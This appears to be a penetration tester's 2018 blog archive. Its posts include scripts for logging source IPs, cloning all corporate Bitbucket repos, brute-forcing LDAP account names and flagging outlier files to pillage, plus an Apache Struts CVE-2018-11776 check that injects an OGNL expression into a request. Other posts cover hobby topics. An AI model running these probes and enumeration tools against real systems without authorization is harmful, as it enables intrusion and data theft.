Wednesday, November 28, 2018

Keep Track Of Your Source IP

Pentesters/RedTeamers often need to track their outgoing IPs so Blue Teams can correlate activity and tell whether an attack is scheduled activity or something else.

Below is a script that will reach out, grab your public IP, and if it's different from the last entry, enter it into a log file. I use crontab to execute it at the top of every minute.
# This script records changes to your external IP to a log file with timestamp
# Install:
# crontab -e
# * * * * * /Users/MYUSERNAME/WHEREVER/
# And then change the iplogfileloc below to where you want the logfile to save.

# You should have an iplog.txt with contents like this:
# $ cat iplog.txt
# Wed Nov 28 12:56:40 MST 2018 --
# Wed Nov 28 13:00:07 MST 2018 --

# Change the below location to what you want
iplogfileloc=~/iplog.txt

# NOTE: endpoint assumed from the "origin" field parsed below;
# httpbin.org/ip returns JSON like {"origin": "1.2.3.4"}
myip=$(curl https://httpbin.org/ip 2> /dev/null | grep origin | awk '{print $2}' | tr -d '"')

# create file if it doesn't exist
[ -f "${iplogfileloc}" ] || touch "${iplogfileloc}"

if ! tail -1 "${iplogfileloc}" | grep -q "${myip}" ; then
    # if your IP has changed, add it to the file
    echo "$(date) -- ${myip}" >> "${iplogfileloc}"
fi

Now you can change IPs via VPN or whatever and always be able to refer to it later. The only edge case is if you change IPs multiple times within one minute, but that should be rare and accounted for in sprays.

Monday, November 26, 2018

Ways to Enumerate Users

Below are several methods to identify usernames that can then be used in other areas of a pentest. I added as many as I could think of, limiting it mostly to ones usable from the public Internet.

Tuesday, September 18, 2018

Saner Bash Commands Inside Python

As great as Python is, sometimes the devs make really weird decisions regarding defaults. A perfect example is running shell commands inside Python 3+. For some reason they thought it was a good idea to make the subprocess "run" method _not_ capture the output from stdout or stderr by default. I find this incredibly annoying, and it constantly results in me having to look up the syntax since I always forget it.

I decided to instead have this little helper function to encapsulate what I consider to be saner defaults. I decode the bytes into utf8 since that's the encoding for 99% of all bash command output.

#!/usr/bin/env python3
import subprocess

def run_cmd(cmd):
    result = subprocess.run(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    result.stdout = result.stdout.decode('utf8')
    result.stderr = result.stderr.decode('utf8')
    return result

Running that function will execute whatever command you pass it (insecure, so use it appropriately) and return an object on which you can check the return code, stdout, and stderr.

So now, it's just:

In [25]: if 'root' in run_cmd('whoami').stdout:
   ....:     print("you are root")
you are root

Thursday, August 30, 2018

Download All Corporate Git Repos

Depending on the client you are testing, they may have an internal development team that checks code into a git repo. The vast majority of the clients I've seen implement the Atlassian suite of tools, typically containing an internally hosted Bitbucket.

The Bitbucket web interface has a search feature for looking for code snippets. It's absolutely awful. It's like an off-brand Tonka-toy reject of a search function. You know what's way better? grep. That means I'd have to download every repo to search them locally. I did that with this script:
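The script itself didn't survive the copy into this post, but the approach is simple enough to sketch. Below is a minimal, hypothetical version against the Bitbucket Server REST API (`/rest/api/1.0/repos`); the base URL is a stand-in, and anonymous access is assumed, so add auth headers as needed:

```python
import json
import subprocess
import urllib.request

# Hypothetical Bitbucket Server base URL -- change this to your target.
BITBUCKET_URL = "https://bitbucket.example.com"

def extract_clone_urls(page):
    """Pull the http(s) clone URL out of one page of the repo listing."""
    urls = []
    for repo in page.get("values", []):
        for link in repo.get("links", {}).get("clone", []):
            if link.get("name") == "http":
                urls.append(link["href"])
    return urls

def clone_all(base_url=BITBUCKET_URL):
    """Walk the paged repo listing and git-clone every repo locally."""
    start = 0
    while True:
        resp = urllib.request.urlopen(
            f"{base_url}/rest/api/1.0/repos?limit=100&start={start}")
        page = json.load(resp)
        for url in extract_clone_urls(page):
            subprocess.run(["git", "clone", url])
        if page.get("isLastPage", True):
            break
        start = page["nextPageStart"]
```

Once the clones finish, grep away.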

It's handy to note that grepping isn't the only good thing about cloning repos locally. It allows you to run the myriad of vuln checker tools, load up the code into an IDE and run source/sink analysis on it, and much more.

Wednesday, August 29, 2018

Brute Force LDAP Names (or how I kinda downloaded LDAP)

Running queries over a network using the ldapsearch tool can be a bit annoying. It's especially annoying when you constantly run into the "size limit exceeded" result when you get large responses.

I decided to write a little tool to recursively and conditionally search LDAP for CN entries (basically AD account names) and download them locally. If it detects the size limit error, it automatically adds a new character to drill down even further.
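The tool itself isn't shown in this copy, so here's a rough sketch of the recursion it describes. The ldapsearch arguments (server, base DN) are placeholders, and matching on the string "Size limit exceeded" is an assumption about how the error surfaces in ldapsearch output:

```python
import string
import subprocess

# Hypothetical connection details -- point these at your target DC.
LDAP_CMD = ["ldapsearch", "-x", "-H", "ldap://10.0.0.1", "-b", "DC=corp,DC=local"]

def ldap_search(prefix):
    """One ldapsearch for CNs starting with `prefix`; returns the raw
    output and whether the server hit its size limit."""
    out = subprocess.run(LDAP_CMD + [f"(cn={prefix}*)"],
                         capture_output=True, text=True).stdout
    return out, "Size limit exceeded" in out

def crawl(prefix="", chars=string.ascii_lowercase + string.digits,
          do_search=ldap_search, results=None):
    """Recursively add characters to the CN prefix until each query
    fits under the size limit, collecting complete responses."""
    if results is None:
        results = {}
    for c in chars:
        out, truncated = do_search(prefix + c)
        if truncated:
            crawl(prefix + c, chars, do_search, results)
        else:
            results[prefix + c] = out
    return results

def dump(results):
    """Write each complete response to <prefix>.out for grepping."""
    for prefix, out in results.items():
        with open(f"{prefix}.out", "w") as f:
            f.write(out)

# usage: dump(crawl())
```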

It works fantastically well. After you run this tool you should have many .out files containing LDAP query responses. Grep to your heart's content:

Thursday, August 23, 2018

Apache Struts 2 Vulnerability & Exploit (CVE-2018-11776)

Yesterday a new vulnerability in certain versions of Apache Struts (2.3 - 2.3.34, 2.5 - 2.5.16) was disclosed that leads to RCE. It requires both a vulnerable version and a vulnerable configuration.

The gist of the issue is that if you have a vulnerable configuration that doesn't assign a namespace to an action, Struts will take the user-specified namespace instead. Fortunately for us, it then evaluates that namespace as an OGNL expression, allowing you to fairly easily get remote code execution.

Working PoC (I personally tested it myself and it works)

Technical deep dive on finding the vulnerability:

Vuln writeup by Semmle (including conditions for vulnerable configurations)

Apache's security bulletin for the vuln:

Mitre CVE link:

A couple caveats I found while testing:
  • It definitely requires a lack of namespace attribute in the classes xml
  • All that is required for successful exploitation is a single proper GET request
  • Doesn't work on all struts-showcase installs (2.3.15 wasn't working for some reason), making me think it may be a bit finicky
I modified the PoC listed above into a simple python function, making everything simpler:
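My modified function didn't make it into this copy. As a stand-in, here's a detection-only sketch based on the widely published check for this CVE: URL-encode an arithmetic OGNL expression like ${233*233} into the namespace position and look for the product (54289) reflected in the redirect Location header. The /actionChain1.action endpoint matches the struts2-showcase PoC; adjust for other apps:

```python
import urllib.error
import urllib.parse
import urllib.request

def build_check_url(base, a=233, b=233):
    # URL-encode the OGNL expression and place it where the
    # namespace belongs; a vulnerable server evaluates it.
    payload = urllib.parse.quote(f"${{{a}*{b}}}", safe="")
    return f"{base}/{payload}/actionChain1.action"

class _NoRedirect(urllib.request.HTTPRedirectHandler):
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None  # surface the 302 instead of following it

def is_vulnerable(base):
    """True if the redirect Location contains the evaluated product
    (54289 for 233*233), i.e. the namespace was OGNL-evaluated."""
    opener = urllib.request.build_opener(_NoRedirect)
    try:
        resp = opener.open(build_check_url(base))
        location = resp.headers.get("Location", "")
    except urllib.error.HTTPError as e:
        location = e.headers.get("Location", "")
    return str(233 * 233) in location
```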

Below is it being run against a vulnerable VM I set up

Wednesday, August 15, 2018

Twitter Controlled Anything - Micropython on ESP32

I recently purchased an ESP32 from Amazon for testing purposes, and a colleague mentioned you could install a minimalist Python environment on them for control. To say the least, I was intrigued.

I wanted to be able to control a light (or anything really) using tweets. Below are the instructions/scripts I wrote to get it working. First comes the prerequisites:
  • ESP32 (duh)
  • A VPS, Pi, or really any computer acting as a flask server (it just needs internet access)
  • A wifi network for the ESP32 to connect to (I just used the hotspot on my phone as a PoC)
  • Twitter API credentials (really easy to get, just fill out the forms)
Your ESP32 will query your flask server for a trigger word to enable the LED. The Flask server will query Twitter for your latest top tweet; if it has the trigger word in it, it relays that to the ESP32 client. Boom, tweet causes LED to turn on.

The first step is to get your ESP32 setup running the micropython environment. I followed this excellent guide

Once you get your ESP32 configured to run python code, go ahead and transfer the following script to act as the client. You just need to change the wifi details and target flask server:

import machine
import urequests
import time

pin = machine.Pin(2, machine.Pin.OUT)

def connect():
    import network
    sta_if = network.WLAN(network.STA_IF)
    if not sta_if.isconnected():
        print('connecting to network...')
        sta_if.active(True)
        sta_if.connect('YOUR_SSID', 'YOUR_PASSWORD')  # change the wifi details
        while not sta_if.isconnected():
            pass
    print('network config:', sta_if.ifconfig())

def no_debug():
    import esp
    # this can be run from the REPL as well
    esp.osdebug(None)


no_debug()
connect()

while True:
    # poll the flask server every 2 seconds; LED on while it says 'yes'
    if 'yes' in urequests.get('').text:
        pin.value(1)
    else:
        pin.value(0)
    time.sleep(2)

Connect the LED to Pin 2 on the ESP32 and it's all set to go. Now onto the flask server...

On your VPS/Pi/whatever, install flask and tweepy and create a directory to hold your script files. Grab the Access Token, Access Secret, Consumer Secret, Consumer Key from your Twitter Dev console that you set up earlier and place them in a "twitter_creds.py" file like the following:

ACCESS_TOKEN = '18077065-lakjsdflkajshdlfkajshdflkajsdhqqSYOtHSXtK1'
ACCESS_SECRET = 'hPqlkwjehrlkfjnlqwejhqrwklejrqhlwkejrJr1'
CONSUMER_KEY = 'QZlk9qlkwejrhqlkwjerhlqwlLh'
CONSUMER_SECRET = 'uEnkzjxcnvluqblwjbefkqwlekjflkqjwehflqlkjhuOE'

Then paste the following into "tweepy_top.py":

from twitter_creds import *

import tweepy

auth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)
auth.set_access_token(ACCESS_TOKEN, ACCESS_SECRET)

api = tweepy.API(auth)

def get_top_tweet():
    top_tweet = api.user_timeline(count=1)
    return top_tweet[0].text

Now create your main flask app by pasting the following into "":

from flask import Flask
from tweepy_top import get_top_tweet

app = Flask(__name__)

@app.route('/')
def hello():
    if 'light' in get_top_tweet():
        return 'yes'
    else:
        return 'no'

if __name__ == "__main__":
    app.run(host="", threaded=True)

There you can see 'light' is used as the trigger word. Using this setup, every 2 seconds the ESP32 makes a request to your flask server, which causes the flask server to query Twitter for the user's top tweet. If the top tweet contains the word "light", the server returns the string "yes". The ESP32 recognizes the "yes" and turns on pin 2.

This is a very simple PoC and gets the job done. You can take this and expand in a thousand directions with it, some ideas:

  • A desktop counter that keeps track of your followers, retweets, likes, etc
  • An LED scroller that outputs your latest mentions
  • Or simply use twitter as the control for some device
The options are endless...enjoy :D

Thursday, August 2, 2018

Top 100 Ingredients From HomeChef Recipes

I love cooking; I consider it my primary hobby outside of infosec/coding. I had HomeChef for several months and absolutely loved it. I looked forward to each selection every week and always got to try new techniques/flavors/combinations I probably would never have tried on my own.

Every meal they sent us had a double-sided recipe page to guide you through the process. I noticed something at the bottom of the recipe page:

They have a handy link for each recipe posted on their website, probably so it's easy to share what you made with family/friends. The fact that I saw a number, along with a list of ingredients, got me thinking...

If I were to stock my pantry/fridge with "basic" ingredients, what would it look like? How about I count up the occurrences of certain ingredients on each recipe page, that should give me a good idea.

Well, after gathering the data over a couple of days (I kept everything slow so as to not cause any problems), I present to you the top 100 ingredients according to HomeChef's recipe pages:

Count Ingredient
609 Garlic Cloves
433 Butter
345 Boneless Skinless Chicken Breasts
320 Green Onions
315 Shallot
219 Lemon
210 Sour Cream
208 Lime
202 Red Onion
186 Grape Tomatoes
178 Red Bell Pepper
170 Parsley Sprigs
158 Yellow Onion
154 Mayonnaise
153 Red Pepper Flakes
152 Honey
149 Liquid Egg
148 Cremini Mushrooms
142 Russet Potatoes
142 Green Beans
138 Jasmine Rice
135 Cilantro Sprigs
134 Sugar
131 Chopped Ginger
125 Baby Arugula
122 Grated Parmesan Cheese
119 Carrot
117 Roma Tomato
114 White Cooking Wine
104 Baby Spinach
102 Grated Parmesan
101 Panko Breadcrumbs
100 Light Cream
100 Shredded Mozzarella
99 Slaw Mix
98 Jalapeño Pepper
95 Cilantro
95 Shrimp
94 Thyme Sprigs
93 Zucchini
93 Garlic Clove
89 Parsley
88 Sriracha
87 Dijon Mustard
84 Sirloin Steaks
82 Cornstarch
76 Heavy Whipping Cream
76 Light Brown Sugar
75 Seasoned Rice Vinegar
74 Romaine Heart
73 Pork Tenderloin
72 Kale
72 Shredded Cheddar Cheese
72 Asparagus
71 Sweet Potato
71 Flour
69 Roasted Red Peppers
69 Spinach
69 Ground Beef
68 Salmon Fillets
68 Matchstick Carrots
68 Toasted Sesame Oil
62 Brussels Sprouts
62 Soy Sauce - Gluten-Free
61 Carrots
60 Mini Baguette
57 Small Flour Tortillas
57 Persian Cucumber
57 Basil Pesto
56 Green Onion
56 Ground Turkey
54 Teriyaki Glaze
54 Radishes
54 Red Fresno Chile
53 Beef Demi-Glace
52 Ear of Corn
51 Basil Sprigs
51 Roasted Chicken Breast
50 Roma Tomatoes
50 Blue Cheese
50 Canned Evaporated Whole Milk
49 Marinara Sauce
49 Extra Firm Tofu
48 Smoked Paprika
47 Balsamic Vinegar
47 Naan Flatbreads
47 Bacon Strips
47 Chicken Demi-Glace
46 Taco Seasoning
45 Avocado
45 Broccoli Florets
45 Frozen Peas
44 Chives
44 Corn Kernels
44 Plain Greek Yogurt
44 Tilapia Fillets
43 Navel Orange
43 Feta Cheese
43 Bone-in Pork Chops

What would a post be without some code? Below is the embarrassing Python script (hey, it worked...) that parses the HTML:
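The script itself is missing from this copy, but the counting core looks roughly like this (a sketch assuming lxml and the itemprop="recipeIngredient" markup referenced in the XPATH notes):

```python
import collections
from lxml import html  # assumed; any HTML parser with XPath support works

def count_ingredients(pages):
    """Tally itemprop="recipeIngredient" values across a list of
    recipe pages (HTML documents as strings)."""
    counts = collections.Counter()
    for page in pages:
        tree = html.fromstring(page)
        for node in tree.xpath('//*[@itemprop="recipeIngredient"]'):
            counts[node.text_content().strip()] += 1
    return counts

# counts.most_common(100) produces a table like the one above
```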

XPATH Notes (how to grep xpath)

XPATH is a querying language for XML document trees. Lots of web scrapers use it since HTML can be represented as XML directly.

Your basic "grep" like XPATH query is something like the following:

  • //*[@itemprop="recipeIngredient"]

  • // = start at root of tree and include itself in any searches
  • * = any tag, anywhere in the document, otherwise replace with tag name
  • [blah] = evaluate the condition blah inside the brackets
  • @itemprop = This is how you reference attributes instead of tags
  • [@itemprop] = the condition is: if the itemprop attribute exists in some tag
  • [@itemprop="recipeingredient"] = condition is: if itemprop attribute's value is "recipeingredient"
Another example: if I wanted to find anything in an XML document that references a particular site, I'd search for any href attribute matching that site's URL, like so:
  • //*[@href='']
Or limit it just to direct hyperlinks like "a" tags
  • //a[@href='']
XPATH has a lot more functionality than this but this is mostly what I need it for.

The expression in the condition brackets "[blah]" can be used with certain functions:
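The list got cut off here, but the XPath 1.0 functions I reach for most inside condition brackets are contains(), starts-with(), and text(). A quick demo (using lxml, an assumption on my part, since the stdlib ElementTree only supports a small XPath subset):

```python
from lxml import etree

doc = etree.fromstring(
    '<links>'
    '<a href="https://example.com/page">one</a>'
    '<a href="https://other.net/x">two</a>'
    '<b href="https://example.com/other">three</b>'
    '</links>')

# contains(): substring match against an attribute value
both = doc.xpath('//*[contains(@href, "example.com")]')

# starts-with(): prefix match against an attribute value
first = doc.xpath('//a[starts-with(@href, "https://example.com")]')

# text(): match on the element's text content
second = doc.xpath('//a[text()="two"]')
```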

Wednesday, August 1, 2018

Finding Interesting Files Using Statistical Analysis

I noticed a pattern when scrounging for target data on pentests. Most of the time when I find valuable data (test creds/log data/unencrypted logs/etc), it's in files that are in some way different from those around them. Sometimes it's their filename, like when you have 400 files named "NightlyLogDATE" and you see a "NightlyLogDATE.bak". It also tends to happen with file sizes: you'll have a directory where almost every file is around 400-600KB, and a couple will be megabytes big or only a couple KB.

These files are "interesting" to me because they differ in some way. These are the outliers. Sometimes they will be temporary backup files where a tech needed to test credit card processing with encryption turned off, or maybe some error pumped traceback/debug output to an otherwise normal file.

I decided to scrounge around online to stitch together a script that will report these outlier files.

The following script will look in the target directory, calculate the median absolute deviation of the file sizes, compare each file against a threshold, and return the filenames for you to prioritize pillaging.
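The stitched-together script isn't included in this copy, so below is a minimal sketch of the idea: flag any file whose size has a modified z-score (0.6745 * deviation / MAD) above the conventional 3.5 cutoff. The directory walk and threshold are illustrative:

```python
import os

def median(values):
    s = sorted(values)
    n = len(s)
    return s[n // 2] if n % 2 else (s[n // 2 - 1] + s[n // 2]) / 2

def mad_outliers(sizes, threshold=3.5):
    """Indices of values whose modified z-score
    (0.6745 * |x - median| / MAD) exceeds the threshold."""
    if not sizes:
        return []
    med = median(sizes)
    deviations = [abs(x - med) for x in sizes]
    mad = median(deviations)
    if mad == 0:  # all files (nearly) identical in size
        return []
    return [i for i, d in enumerate(deviations)
            if 0.6745 * d / mad > threshold]

def interesting_files(directory, threshold=3.5):
    """Return paths in `directory` whose sizes are statistical outliers."""
    paths = [os.path.join(directory, f) for f in os.listdir(directory)]
    paths = [p for p in paths if os.path.isfile(p)]
    sizes = [os.path.getsize(p) for p in paths]
    return [paths[i] for i in mad_outliers(sizes, threshold)]

# usage: print("\n".join(interesting_files("/mnt/loot")))
```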

It's fairly basic so I'm happy to accept any code donations :D